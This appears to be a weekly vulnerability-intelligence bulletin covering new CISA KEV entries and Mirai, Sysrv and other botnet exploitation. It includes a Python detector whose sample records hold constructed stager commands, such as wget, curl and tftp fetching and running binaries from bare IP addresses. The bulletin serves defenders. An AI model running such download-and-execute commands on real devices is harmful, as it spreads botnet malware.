Executive Summary
In a troubling development this week, exploitation activity surged: six new entries were added to the CISA KEV list, up from a single CVE the previous week. Critical vulnerabilities in Ivanti EPM and Zimbra's postjournal service have become attractive targets for threat actors, primarily because proof-of-concept exploits are publicly available.
The persistent threats posed by outdated vulnerabilities were exemplified by the Motion Spell GitHub repository and SAP Commerce Cloud, both of which were recognized as critical risks and subsequently added to the CISA KEV list.
Two significant command injection vulnerabilities, one affecting DrayTek Vigor routers and one affecting D-Link DIR-820 routers, were exploited by threat actors to spread the Mirai botnet. In addition, for the third week in a row, the Mirai botnet has targeted TP-Link Archer AX21 routers, showing its relentless focus on compromising consumer devices.
Simultaneously, the Sysrv and Enemy botnets have been detected actively exploiting vulnerabilities in Spring Cloud Gateway, effectively broadening their scope of attack. Additionally, the IoT_Reaper botnet continues its operations, persistently targeting an eight-year-old vulnerability found in MVPower CCTV DVR models.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
CVE-2024-29824
A critical SQL Injection vulnerability has been identified in the Ivanti EPM Versions 2022 SU5 and earlier. With a high CVSS Score of 9.6, this vulnerability was added to the CISA KEV catalog. Although this vulnerability has a low EPSS of 0.00067, the publicly available proof of concept makes it highly susceptible to exploitation.
CVE-2024-45519
A critical vulnerability in Zimbra's postjournal service enables unauthenticated attackers to execute arbitrary code on affected systems. With a CVSS score of 10 and an available proof-of-concept, this vulnerability has been added to the CISA KEV list, emphasizing the urgent need for users to apply patches and strengthen security measures.
CVE-2023-25280
According to Unit 42, a critical command injection vulnerability in D-Link DIR820LA1_FW105B03 routers has been actively exploited by a variant of the Mirai Botnet since March 2023. This vulnerability allows attackers to escalate privileges to root through a specially crafted payload. Due to its severity, it has been added to the CISA KEV list.
CVE-2021-4043
A null pointer dereference vulnerability has been identified in GPAC (the Motion Spell GitHub repository) in versions prior to 1.1.0, allowing attackers to execute arbitrary code. With a publicly available proof of concept demonstrating the exploit, this vulnerability has been classified as severe and subsequently added to the CISA KEV list.
CVE-2020-15415
A critical command injection vulnerability in DrayTek Vigor3900, Vigor2960, and Vigor300B routers allowed attackers to execute arbitrary code remotely. This vulnerability was exploited by the V3G4 variant of the Mirai botnet from July to December 2022 and has been recently added to the CISA KEV list.
CVE-2019-0344
A critical deserialization of untrusted data vulnerability in SAP Commerce Cloud allows attackers to execute malicious code on the target system by exploiting flaws in the deserialization process. By leveraging this flaw, attackers can run arbitrary code with the privileges of the 'Hybris' user, potentially compromising the application. This vulnerability has been added to the CISA KEV list, highlighting its severity and the urgent need for patching.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section identifies vulnerabilities exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose captured payloads are suggestive of botnet activity, such as invoking wget against a bare IP address.
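The heuristic described above, a download utility (wget, curl, tftp) fetching from a bare IPv4 address rather than a hostname, can be applied to sensor captures to rank CVE tags by stager-like payload volume. The following is an added illustration, not Loginsoft's own sensor code; the records, addresses (RFC 5737 documentation ranges) and paths are constructed, and only the CVE tags come from this report.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Download utilities typical of botnet stagers, followed (within the same shell
# command, i.e. before any ; & |) by an argument whose host is a bare IPv4 address.
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
_FETCH_BARE_IP = re.compile(
    r"\b(wget|curl|tftp)\b[^;&|]*?\b(" + _IPV4 + r")\b", re.IGNORECASE
)


def classify_payload(raw):
    """Return (tool, ip) if the payload fetches from a bare IP address, else None."""
    # Sensor captures are usually URL-encoded; decoding twice also unwraps
    # double-encoded payloads, and plain text passes through unchanged.
    decoded = unquote(unquote(raw))
    m = _FETCH_BARE_IP.search(decoded)
    return (m.group(1).lower(), m.group(2)) if m else None


def top_botnet_cves(records, n=5):
    """Rank CVE tags by how many of their captured payloads look like botnet stagers."""
    hits = Counter()
    for rec in records:
        if classify_payload(rec["payload"]) is not None:
            hits[rec["cve"]] += 1
    return hits.most_common(n)


# Constructed sensor records: CVE tags are those discussed in this report,
# the payloads are made up for illustration and are not real captures.
SAMPLE_RECORDS = [
    {"cve": "CVE-2023-25280", "payload": "cd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbot.sh%3Bsh%20bot.sh"},
    {"cve": "CVE-2023-25280", "payload": "cd /tmp; curl -O http://203.0.113.9/x86; chmod +x x86"},
    {"cve": "CVE-2020-15415", "payload": "wget http://198.51.100.7/arm7 -O /tmp/a; /tmp/a"},
    {"cve": "CVE-2020-15415", "payload": "tftp -g -r mips 192.0.2.44; sh mips"},
    {"cve": "CVE-2024-29824", "payload": "ping -c 1 203.0.113.9"},                       # IP but no fetch tool
    {"cve": "CVE-2024-36401", "payload": "wget https://updates.example.net/agent.sh"},  # DNS host, not bare IP
]

if __name__ == "__main__":
    for cve, count in top_botnet_cves(SAMPLE_RECORDS):
        print(f"{cve}: {count} stager-like payload(s)")
```

Only tags that produced at least one stager-like payload appear in the ranking, so the two negative samples (an IP without a fetch tool, and a fetch from a DNS name) are excluded.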
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information comes from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2024-36401
Recent investigations by Trend Micro have revealed that an eval injection vulnerability in GeoServer, which can lead to remote code execution, has been actively exploited by the Chinese threat actor Earth Baxia. This group has leveraged the flaw to deploy Cobalt Strike payloads and a custom backdoor called EAGLEDOOR. Historically, attackers have also exploited this vulnerability to deliver SideWalk malware, a sophisticated backdoor tied to the APT41 threat group. Moreover, the flaw has been used to spread Mirai variants such as JenX and the Condi DDoS bot.
CVE-2024-21338
Sentinel Labs reported that an affiliate group associated with Mallox ransomware has exploited a privilege escalation vulnerability in Windows Kernel, using a Linux-based ransomware tool called Krystina to gain elevated privileges. This strategic use of cross-platform tools enhanced the attackers' ability to deepen system access and amplified the overall impact of their ransomware operations.
PRE-NVD observed for this week
This section covers vulnerabilities discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand.
External References
- https://www.cisa.gov/news-events/alerts/2024/10/02/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2024/10/03/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2024/09/30/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/
- https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
- https://unit42.paloaltonetworks.com/mirai-variant-v3g4/
- https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-remote-code-injection/execution-vulnerability-(cve-2020-14472